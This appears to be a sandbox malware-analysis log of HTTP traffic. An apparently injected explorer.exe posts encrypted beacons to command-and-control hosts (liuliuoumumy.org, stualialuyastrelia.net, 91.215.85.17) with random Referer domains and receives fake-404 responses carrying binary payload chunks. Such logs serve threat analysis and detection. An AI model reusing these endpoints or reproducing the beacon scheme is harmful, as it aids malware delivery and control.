Nov 30, 2023 11:19:33.673053980 CET	330	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kwrtkxoweaqgtel.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 266 Host: liuliuoumumy.org
Nov 30, 2023 11:19:33.673083067 CET	320	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 8f bc 3e b5 Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bO>otD9!feko4p?-0"%o 7(F1*?(wD2CFBmU1pajTB2@f90bX!LhiUU;k9
Nov 30, 2023 11:19:34.235692024 CET	472	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:19:33 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=6c2b45f1170b528fac8e5f9cd44eae92\|149.18.24.110\|1701339573\|1701339573\|0\|1\|0; path=/; domain=.liuliuoumumy.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=149.18.24.110; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49738	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:19:34.620127916 CET	335	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dgqvplegiwcfaq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 210 Host: stualialuyastrelia.net
Nov 30, 2023 11:19:34.620127916 CET	264	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 f2 a9 0a a1 Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bOpwMx-c<o$!keUu8)]x7K2)0-\;^MIi7m +mA)\>!>J
Nov 30, 2023 11:19:34.870848894 CET	1340	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:19:34 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 18 00 00 00 1f 3d 53 a8 37 66 30 7c 67 57 e9 d9 8c f4 ed 35 70 40 c7 45 89 0c 8a a1 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 8b 3e 6c 0d a7 1b 52 86 af 2f 77 aa 83 0a 43 00 39 77 0d e0 2f 81 e6 89 73 59 a7 7d 68 54 09 6d 9a 1d 31 84 ec ba e2 a7 40 9f 98 15 d4 f0 30 2a 63 2f 26 3c c7 4d 8c 99 39 6c 3d 53 47 c2 9e 39 be 29 8d 28 26 61 f2 3c 8d ce 02 b5 cf 78 62 e5 a5 c1 90 5c 2d ab ee 05 93 38 52 fe 4e 35 05 dc 44 49 ab a0 3f 72 54 62 f6 a4 60 d1 17 4b 2b 97 4b 52 9a 18 6b 6f 52 3a dc ee 4b ce a5 5c 42 10 ea f6 7a fe 3c b9 4c 8c 72 cf 3f 43 a1 b2 6f 0a 0a ca 4e 25 6f 4c 3a 3d b2 5c e8 84 fd bc 6d e2 dc a1 a7 f4 73 93 20 fc 0c 82 88 12 f7 a3 ef 06 14 ad 02 3a 46 8a 0d a9 07 fa 67 45 f6 23 fc 4b 2c be 78 bf 55 36 4c 3d f5 3c 42 3e 7d e8 28 7a 3a 34 d7 41 b4 90 2c a6 59 58 e5 62 09 eb 95 5a b7 ba c5 09 16 be 03 bb 2b 37 b1 3e a1 b3 1b c7 8b ef 77 04 77 3f 6c df 89 82 9b 28 97 e9 b0 ea 24 de c0 49 60 55 8c df 1a 73 e8 78 31 3e 8b 58 94 82 3e 37 59 63 c3 36 e3 3a 2f b3 b6 09 fb 7f f3 8f 1b fc 26 28 bc fd 33 3f 89 5e bf f1 0e 63 62 99 63 9d 20 36 fe f0 a2 86 2c 4b 78 f2 b4 2c d4 ce 13 c4 2d ca 95 3a d9 64 6d 54 b3 5c 76 2c 4e 89 f7 3d 58 4d f5 12 8b 75 0c f8 cd 2b 7d 30 c0 2b fe 21 2a 7f 15 6d 3f 16 9e 01 b5 69 eb 9d ed 8d ee 41 d5 45 24 19 4b 1f 52 f1 9d 79 17 9b a4 e5 ab ea fc 39 44 e6 f0 63 b3 34 62 01 f0 92 0e 5e fc fd 8a c8 9b 10 5f 47 d8 54 31 a2 2b c6 4d 36 cd 60 df d8 4f c5 44 25 78 20 ef 1b 08 ad 5d 35 d1 7a 05 c7 57 dd b3 46 91 4a 01 92 a0 31 f3 b6 5f 99 74 c0 c9 f3 12 b1 02 66 86 b1 ad f1 8b 14 d9 ea 1a 24 e9 4e d1 15 f3 a9 1c c4 16 d5 e6 00 a7 09 17 b6 de 40 6b c3 fd cf f3 3b 5b 4a 76 fb 4d fa 6a d1 2c c1 e0 7e 1b 2b c0 11 6e b8 9d 9a fa 03 03 c5 6c 91 63 12 49 53 b1 0f 30 36 77 1f f7 e6 87 ad 05 de 93 db fc 4e f1 69 be e5 e3 9e e3 56 da ef ef 8a c8 40 39 ae 15 4f ce b3 12 7c 8e 6a 18 41 66 35 99 7e 83 84 08 cd ee cf cd 9b da 0d 58 73 6c 8a 96 03 37 fa 43 43 fe a8 50 75 48 e9 60 17 4c aa 25 df a1 a9 6a b9 d6 d6 a4 62 e8 a9 b7 76 79 f1 50 93 7c 2c e6 d0 49 56 e1 d6 47 59 19 7d 27 84 22 66 13 de 9e 1f a0 7c 85 2b dc ef 24 3b 92 33 8d a6 52 d2 8e 29 80 d0 f3 4f b5 e2 72 22 4d 9a 70 ea 84 bd 7e 69 94 5b c4 f6 01 42 7c ee a7 84 cd 7a 58 39 62 79 cf f7 6f e9 d6 eb 85 59 0e 75 06 d1 04 8d d7 af 40 60 76 57 c4 2d 70 c6 b0 57 ad 50 f1 57 80 a0 a2 04 10 a1 2f 49 6d 26 b4 91 24 df 14 8f b6 65 b1 49 70 9f 31 03 96 8c 54 0a 5b 2c 95 a1 8e bd 1f f3 f5 56 7e 79 48 59 a9 3d 78 ed 6f 4f 33 13 20 7a ad f0 83 08 17 2f f1 27 a6 d0 f2 c0 9d 2a 19 c8 4b 73 42 fb 6d 8e 46 46 5e 76 11 29 3e c1 4b 58 80 22 17 75 a5 9a cb a2 29 73 76 ff 45 a7 3e 33 23 bd eb 32 16 b9 e2 67 6e f1 5c 47 79 b8 5a de 69 7e 2e bf 3c 4d bb fb 2a 1b c5 0c e4 c6 60 15 56 38 18 d5 f9 83 7f a0 63 2f d2 f0 46 65 73 fe 74 89 c7 8b 39 3e db 7d 26 f1 9c 20 e5 d4 19 85 0e 0c 22 4b 08 f1 72 8e 91 31 8c 96 e7 6c f0 0e 8c 92 98 23 9c d0 f4 a2 22 95 79 ad ce ab 6e 3e 6f 41 03 5a 3a 9a 95 d0 37 fb 9a d3 c8 f4 ce fb 4e 34 c8 e9 fc 81 7d 09 69 48 c2 51 34 c8 80 56 30 90 62 42 15 4d 94 8d 70 58 ca 82 cd ca 50 85 73 ba 57 b4 49 5d a5 0c 36 7c 83 c6 7d b7 dd 34 16 96 9c e6 03 4d 95 bf a4 56 a4 5e 0d 3c 90 c5 d0 f5 93 fc 59 fe 37 8d 84 3b 7a 0d 21 42 ad ec 32 91 72 d6 70 e7 13 d5 b4 a0 15 fc 01 dd dc 99 a7 49 7c 2b 04 07 27 89 89 72 3c 26 42 c1 db a2 96 1f d8 29 e9 38 70 78 f1 df 3e c7 fb 0b 6a a9 Data Ascii: 1f66=S7f0\|gW5p@E74o8>lR/wC9w/sY}hTm1@0c/&<M9l=SG9)(&a<xb\-8RN5DI?rTb`K+KRkoR:K\Bz<Lr?CoN%oL:=\ms :FgE#K,xU6L=<B>}(z:4A,YXbZ+7>ww?l($I`Usx1>X>7Yc6:/&(3?^cbc 6,Kx,-:dmT\v,N=XMu+}0+!m?iAE$KRy9Dc4b^_GT1+M6`OD%x ]5zWFJ1_tf$N@k;[JvMj,~+nlcIS06wNiV@9O\|jAf5~Xsl7CCPuH`L%jbvyP\|,IVGY}'"f\|+$;3R)Or"Mp~i[B\|zX9byoYu@`vW-pWPW/Im&$eIp1T[,V~yHY=xoO3 z/'KsBmFF^v)>KX"u)svE>3#2gn\GyZi~.<M`V8c/Fest9>}& "Kr1l#"yn>oAZ:7N4}iHQ4V0bBMpXPsWI]6\|}4MV^<Y7;z!B2rpI\|+'r<&B)8px>j
Nov 30, 2023 11:19:34.870908022 CET	1340	IN	Data Raw: 20 b5 83 8f ce c8 66 c5 57 bf b8 da a6 60 38 92 c4 04 f6 cc 46 bd 8a 94 a0 75 c2 1e 20 75 c2 9e a2 e5 8b 43 a3 3d c2 11 a2 a1 3e aa d0 63 97 97 8c 7c 09 4d de d5 1f e8 32 6c 17 91 cd a6 b1 ef 6a bb 2c 61 3c a3 64 65 32 0b b0 07 9a 5a a7 0a 52 44 Data Ascii: fW`8Fu uC=>c\|M2lj,a<de2ZRD@7I~2Xwc`cs&)2G(Nn.X4gx?04rMo[;KX06}]pU]%(9g]F[!'if\Ts)z
Nov 30, 2023 11:19:34.870923996 CET	1340	IN	Data Raw: 96 63 fd 15 63 42 c2 68 9a 8e 32 09 24 6a 18 ac 94 67 d9 21 1c e5 b3 35 16 f1 20 6b bb ed 7e e2 e0 c3 89 5c 2f 86 38 6d e5 35 c5 2a 33 ab b5 af db 01 e8 f6 1e ba 4c 58 f8 c4 54 7e 45 89 54 7e d6 f0 13 e6 7e ca fb 0d 3b cb 4b c4 4d b5 6d 84 f2 bb Data Ascii: ccBh2$jg!5 k~\/8m5*3LXT~ET~~;KMm{8lN4P<mpdhKcgJq4.]R8ej965ck1DsM%P^e)-5W:66$7'}Lj[3;9Oyyw;3W1b()
Nov 30, 2023 11:19:34.870935917 CET	1340	IN	Data Raw: f8 8c fe af 93 87 52 0a 60 74 1d e5 8f 0c f4 23 60 2e 0a 8f fe 46 9c 23 72 df 43 cb 1d 75 d7 59 e5 79 d6 c3 20 68 bb 5f 88 af fa 3e aa 25 70 fe 63 8c a9 96 08 cb cf 36 26 d0 06 9d 5b d1 97 e9 d1 7e 9e 1a 64 16 c3 25 57 9b 12 3e d0 8b 43 76 44 39 Data Ascii: R`t#`.F#rCuYy h_>%pc6&[~d%W>CvD99@l(\e-U #nm,Z\|I W];,B1z~6F Kz}fF 4v9k`HZ/O=Iy1 o>kCT\|?+hkq+R<`6
Nov 30, 2023 11:19:34.870979071 CET	1340	IN	Data Raw: ff 6f 02 f6 2f 2d 90 e2 e6 dd ab 7a a6 da d8 dd 7f cc ba e6 bb 6c b6 fc 1a 83 25 81 96 69 c0 be 97 ed c3 b2 07 73 e7 69 92 a1 3b 73 30 93 b7 36 d6 c9 f3 c7 e3 2e f1 bd cb 0f 61 a0 0a 97 9e 40 5b 5d 23 27 4d 30 31 5f 56 eb 52 fa db 74 ce 6b c7 a6 Data Ascii: o/-zl%isi;s06.a@[]#'M01_VRtkCuv.`lC3M.QdvL_KKo T:>t&^]b-6I_Shah*#\|sW[M:w0F%$yJ>3t\jS\Z!
Nov 30, 2023 11:19:34.871052980 CET	1340	IN	Data Raw: 38 ca 47 40 42 3c 2d e0 9f d1 21 78 38 fb 0d a1 18 5d 14 f5 c9 3a e6 2b e0 95 93 40 cb c8 24 a1 3d fd e8 f3 2b 84 3f d5 6a 1c 15 e8 1e 1a a3 17 33 2c 5a 1f 23 1a 81 2c 71 81 7b 99 ef 8d df 82 9b 69 4e cb 1c 44 24 48 3e 58 b2 2d 88 8f 54 5f f8 d6 Data Ascii: 8G@B<-!x8]:+@$=+?j3,Z#,q{iND$H>X-T_HNf]~B\|Zjx)R\|y2DBR B*Vuqm^ATQ`oVP"oXFwCf-%{+)27O_on]2Ozmw
Nov 30, 2023 11:19:34.871066093 CET	1340	IN	Data Raw: 1b c8 af d6 5e 17 b7 e1 60 fc e9 f8 25 b2 53 d4 f8 1b f0 d4 dd 79 a9 0e cc 03 68 df 76 a8 57 3a ef 8e 06 3c fe fd 2e 1d bd dd ec 83 a3 13 95 99 f5 20 f8 84 5f ac 3f 83 90 d8 f7 b4 db 8c 62 cb 0e 09 f5 0a 08 90 17 85 b3 18 b4 85 60 ed 0c c4 16 d4 Data Ascii: ^`%SyhvW:<. _?b`%h8!?5qIZYv~]8HKgLufxV#sf]:rWWAc:=z[7cS8t~s/ht,txuWHEHYzHZ
Nov 30, 2023 11:19:34.871077061 CET	1340	IN	Data Raw: 69 1e 79 51 23 c4 46 9f 19 ca b8 28 f5 98 c1 e3 1d b8 dd c8 35 9f 98 d3 6e 55 80 6e 66 7a 91 fd e6 42 d8 31 94 c5 8c 53 98 ce 85 80 a6 2c b2 91 9e 9f fd e3 f4 42 b3 db 64 f3 e0 22 04 65 94 51 15 43 ce 5d 19 c8 3e 8c 31 d7 d2 01 01 43 b5 6d 9d a1 Data Ascii: iyQ#F(5nUnfzB1S,Bd"eQC]>1CmB1Jq^vvh`+"?%HjBB_hv[3f\X:,'B?#)K;VdpW4R=sA^g%1\<Gy
Nov 30, 2023 11:19:34.871114016 CET	1340	IN	Data Raw: 1e f9 2f dc 67 49 e8 0b 98 33 a7 4e dd dd 24 35 ca 3f 73 8e 0a 43 8f a2 8c 6f 94 9f 0a ee 8b b2 00 f7 9a 7a 75 24 de bc ee ac a2 6c 54 68 1a ac d7 20 1c cf 01 83 da d0 7d 3b 4f 56 15 f2 09 a2 b4 8c 2c b4 cb af 34 c0 3c a5 16 03 22 0b d1 f4 90 12 Data Ascii: /gI3N$5?sCozu$lTh };OV,4<"\|,ulfJE\|SN0(g_"UXT_J<Zzy%/R,?u\d< JMY0yJEyep7v2l6J]XPxvB+Upf]hV\$r+2
Nov 30, 2023 11:19:34.871146917 CET	1340	IN	Data Raw: aa 02 c0 2f b9 32 2f 7b ff 3e c6 b2 c9 17 74 f1 7e 7e 80 c7 f4 ef 7a d7 dd 0b 67 0a ce 39 0c a9 ec ef 8a 1e d4 97 c8 74 62 e0 91 c6 f8 52 3a 50 aa d9 ff 58 73 c1 c5 44 a2 c4 12 cf 72 29 11 aa 5d 1c 3b b8 41 fe ec 9f ec 98 f0 79 3b 6f 5d 68 f3 a5 Data Ascii: /2/{>t~~zg9tbR:PXsDr)];Ay;o]hDXGligPPK/#[N,]=AwGx(SSAzlyXBl'`?)VgLS\|&Wee\|WU!rivBGA?~,cx
Nov 30, 2023 11:19:35.864507914 CET	333	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vdlbllvaixoj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 224 Host: stualialuyastrelia.net
Nov 30, 2023 11:19:36.113722086 CET	653	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:19:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Nov 30, 2023 11:19:36.132081985 CET	333	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kvkxoyemxfrw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 231 Host: stualialuyastrelia.net
Nov 30, 2023 11:19:36.389694929 CET	1340	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:19:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 0d 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 cd 89 f8 54 d4 16 ee 3d 78 46 15 f1 a4 d5 c9 32 67 44 1e 13 4f eb 24 3b 2c 01 b2 b0 9e 25 cf f2 8e 28 50 84 1d 0d ab 85 d2 a8 a2 fd b3 27 ad 3f 57 62 a4 be 7f 74 c1 e9 71 ed 15 1c 8d ac 27 82 4a 36 3c 67 ba e4 b1 94 36 83 a9 9a 8f 45 e5 11 0a 89 66 70 15 30 a4 8b d4 c3 41 ff 46 33 f7 9b fc 46 b4 fb 05 2d 37 c1 71 ac 29 d4 84 15 af 92 1d 47 3d 5f 4e 1b ae ea b7 e4 e0 13 2c 57 0b 3e 78 8d 55 db c4 0d 13 13 bf 1e e1 92 24 08 4f c5 53 e4 cb a1 2d 7f db f5 8a bc 7e 72 7e 5f af 9a a5 44 c9 a0 21 b9 ff 7b 06 91 42 19 e0 cc 9d a9 18 08 03 96 be 25 51 61 90 54 3c 7c 88 38 c8 48 6b 51 c8 4a 9a 03 bd ec 9e ba 7b ac 87 2d bd 61 08 c0 5c bf 46 34 fd f8 17 6c 32 6c 29 7c 0a 8d c7 ad 1b 0e a4 ef 7e 71 c5 d2 0a 1a 6a 9b 0a 58 19 ae 8c 4f 3b 69 82 ae 9c 97 42 4c 75 46 ad f3 57 3b 2a b9 62 ee cc 23 b2 75 0e 31 79 92 90 f7 13 35 e7 e7 0e 2a 4c 80 d0 92 f5 13 37 5e 49 d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af 3b 27 55 09 de ba 68 52 25 f6 9d 63 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 4d 7b 18 51 cc 70 17 4b 81 6b df 8e 82 01 e8 e4 1f ae a9 90 ca a9 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 62 69 e0 67 a0 5c 68 91 41 f6 0e f1 2c 4e ae 03 5b 05 17 e4 a6 79 10 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 59 50 6d 23 e2 cb ef ea 95 03 7a d7 12 75 c1 e0 2b 59 bc bb 01 84 15 28 d2 4a 4e 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 5c e7 44 94 26 29 c4 3a 96 39 44 e7 17 3f 2c ee 7e 4d f4 70 d4 03 09 a7 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 67 23 da b9 a6 3c 29 43 43 c8 1a f1 62 18 ba 11 f8 40 fa 5c 88 c1 f0 ad 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e ec 36 ca 12 df 61 f0 81 19 27 f9 b9 8c f5 c8 69 52 b9 b3 ea 9e 13 6c 46 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 5a 9e 8b 5a 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d b8 6c 7a 3b 33 2b 07 e0 3e 79 4c a4 a9 a8 67 11 11 c7 ed fe 94 33 40 b6 05 26 58 ad b4 a8 ee d6 ae 18 63 22 4b eb 0c 35 4d b5 29 02 55 30 86 da a5 fb 4b 71 03 2e 49 b1 a0 13 43 ed e4 af 17 e4 da a7 7b 83 aa 9e 43 02 89 a4 c6 36 16 Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGT=xF2gDO$;,%(P'?Wbtq'J6<g6Efp0AF3F-7q)G=_N,W>xU$OS-~r~_D!{B%QaT<\|8HkQJ{-a\F4l2l)\|~qjXO;iBLuFW;b#u1y5L7^I1<'i3FH;'UhR%cU@Wd{9f(B@w=fdM{QpKkTUo)2([T&}Wbig\hA,N[ytYPm#zu+Y(JNzk7@\D&):9D?,~Mpvn%.ug#<)CCb@\3%}/#6a'iRlFLEsCRZZW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=lz;3+>yLg3@&Xc"K5M)U0Kq.IC{C6
Nov 30, 2023 11:19:43.524871111 CET	337	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://weswjykfyvfjiymu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 255 Host: stualialuyastrelia.net
Nov 30, 2023 11:19:43.775198936 CET	653	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:19:43 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Nov 30, 2023 11:19:43.779234886 CET	333	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aqwbwpygabcn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 197 Host: stualialuyastrelia.net
Nov 30, 2023 11:19:44.029412985 CET	1340	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:19:43 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 fa 68 97 aa e3 f7 81 c3 4f a7 7a 0f 93 34 a6 cc c5 86 93 ec 77 0a 4b c5 56 32 1f 4f 01 c4 a0 0c 67 e9 e4 7b 0f ec c4 7b a7 67 29 02 24 c6 c2 c1 22 ad 29 41 68 95 ae 17 9c 06 f8 e3 b6 4d 48 7c 74 af c1 99 2c 05 de 6a 4e 1e c2 65 cb a6 8a ef 49 8a e6 8f 73 d1 cb 75 97 c0 f3 00 71 d2 98 65 f1 6f f0 52 33 cc 58 3f 23 be 42 15 d7 07 